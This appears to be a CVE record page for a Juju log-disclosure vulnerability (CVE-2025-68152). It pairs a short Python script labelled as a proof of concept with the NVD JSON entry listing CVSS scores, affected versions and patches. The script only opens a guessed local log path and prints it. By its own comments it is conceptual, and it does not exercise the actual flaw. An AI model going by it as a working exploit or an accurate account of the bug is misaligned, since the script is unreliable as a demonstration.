CVE-2025-68152

#!/usr/bin/env python3 # PoC for CVE-2025-68152: Juju Log File Information Disclosure # This script demonstrates reading arbitrary log files from a compromised workload machine. # Note: This requires access to the underlying filesystem of the compromised Juju unit. import os def read_juju_logs(target_log_path): """ Attempt to read a log file accessible due to the vulnerability. In a vulnerable Juju environment, paths to other models' logs might be accessible. """ try: # Example path structure in Juju: /var/log/juju/<model-id>/<unit-id>/log.log if os.path.exists(target_log_path): with open(target_log_path, 'r') as f: print(f"[+] Contents of {target_log_path}:") print(f.read()) else: print(f"[-] File not found: {target_log_path}") except PermissionError: print(f"[-] Permission denied: {target_log_path}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Simulating an attacker on a compromised workload enumerating logs log_directory = "/var/log/juju/" print("[*] Scanning for accessible Juju logs...") # In a real exploit, the attacker would guess or enumerate model/unit IDs # This is a conceptual representation of reading a file that should be protected target_path = os.path.join(log_directory, "target-model/target-unit/juju.log") read_juju_logs(target_path)

{"cve": {"id": "CVE-2025-68152", "sourceIdentifier": "[email protected]", "published": "2026-04-03T16:16:23.193", "lastModified": "2026-04-21T01:18:39.967", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Juju is an open source application orchestration engine that enables any application operation on any infrastructure at any scale through special operators called ‘charms’. From versions 2.9 to before 2.9.56 and 3.6 to before 3.6.19, it is possible that a compromised workload machine under a Juju controller can read any log file for any entity in any model at any level. This issue has been patched in versions 2.9.56 and 3.6.19."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.9", "versionEndIncluding": "2.9.55", "matchCriteriaId": "E0EAA4DD-F373-4A67-B571-D3899E1E13CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:canonical:juju:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6", "versionEndIncluding": "3.6.18", "matchCriteriaId": "6EDFE9C5-AB90-4FA2-84FF-C005BE2B6D6F"}]}]}], "references": [{"url": "https://github.com/juju/juju/commit/22cdcf6b54c2f371822e1c203d4f341be6c9589e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/commit/c91a1f4046956874ba77c8b398aecee3d61a2dc3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/juju/juju/security/advisories/GHSA-j6f6-jp3p-53mw", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}